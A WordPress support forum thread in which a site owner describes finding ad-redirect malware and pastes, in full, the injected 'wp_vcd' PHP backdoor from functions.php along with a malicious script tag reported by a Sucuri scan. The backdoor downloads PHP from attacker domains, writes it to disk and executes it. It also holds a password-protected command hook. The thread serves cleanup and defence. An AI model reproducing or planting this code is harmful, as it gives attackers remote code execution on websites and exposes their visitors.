Support » Fixing WordPress » Ad Malware on our site but can’t remove!

Viewing 5 replies - 1 through 5 (of 5 total)
  • Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Hi, I finally have cracked down the malware! According to sucuri.com malware scan report was:

    javascript malware. Details: http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1
    <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1447995"></script>
    
    Javascript included from a blacklisted domain. Details: http://sucuri.net/malware/entry/MW:BLK:2
    Javascript: go.mobisla.com

    After some research and using Google I found that this is a malware which use go.pub2srv[.]com, go.mobisla[.]com, go.oclaserver[.com] domains to redirect to their spammy ads.

    Thanks to the site https://www.getastra.com/blog/911/how-to-remove-pub2srv-malware-from-your-wordpress-opencart-website/ which elaborately identified by the malware and have very clear suggestiong to remove this malware.

    I found that both of my functions.php file of my Worldpress theme and child theme was modified. An unidentified plugin injected the following code at the beginning of functions.php file:

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f6efce15ddb7aa5764e90dffbfd5cfdc')) {
        $div_code_name = "wp_vcd";
        switch ($_REQUEST['action']) {
            case 'change_domain';
                if (isset($_REQUEST['newdomain'])) {
                    
                    if (!empty($_REQUEST['newdomain'])) {
                        if ($file = @file_get_contents(__FILE__)) {
                            if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code5\.php/i', $file, $matcholddomain)) {
                                
                                $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
                break;
            default:
                print "ERROR_WP_ACTION WP_V_CD WP_CD";
        }
        
        die("");
    }
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if (!function_exists('theme_temp_setup')) {
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            
            $wp_auth_key = 'd5b746bf6ce7930c9eb0496d5500a7ef';
            if (($tmpcontent = @file_get_contents("http://www.benos.cc/code5.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.benos.cc/code5.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
            elseif ($tmpcontent = @file_get_contents("http://www.benos.pw/code5.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
                
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                }
            } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                
            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                
            } elseif (($tmpcontent = @file_get_contents("http://www.benos.top/code5.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.benos.top/code5.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
            }
        }
    }
    //$start_wp_theme_tmp
    //wp_tmp
    //$end_wp_theme_tmp
    ?>

    After removing the code from both functions.php file, the malware is gone!

    Services that helped me to identify the malware:
    https://sitecheck.sucuri.net/
    https://wordpress.org/plugins/sucuri-scanner/
    http://sucuri.net/malware/entry/MW:BLK:2
    http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1

    Resources and thanks:
    https://www.getastra.com/blog/911/how-to-remove-pub2srv-malware-from-your-wordpress-opencart-website/
    https://toster.ru/q/482218
    https://pastebin.com/bzcCHnT3
    https://wordpress.org/support/topic/mwjsgen2rogueads-unwanted_ads-1-2/
    https://www.upwork.com/job/prevent-SQL-injection-PHP-hardening-wordpress-stop-website-hacks_~013dcf70c6f4637ad3/
    https://fixmywp.com/blog/detect-clean-wordpress-malware-redirect.php

    Update:

    The codes reappearing again and again after delete. What solved me is https://stackoverflow.com/questions/46219263/php-code-in-functions-php-of-all-wordpress-websites-on-my-shared-hosting

    Jaber, same problem i have reappearing again..
    Is there any permanent solution did you find?

    Hi thanks for reply.
    I’ve done all of the your wrote.
    But my web site is broken now. /wp-include/taxonamy.php online 530 .. problem (writing screen).
    What must i do now ?

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Ad Malware on our site but can’t remove!’ is closed to new replies.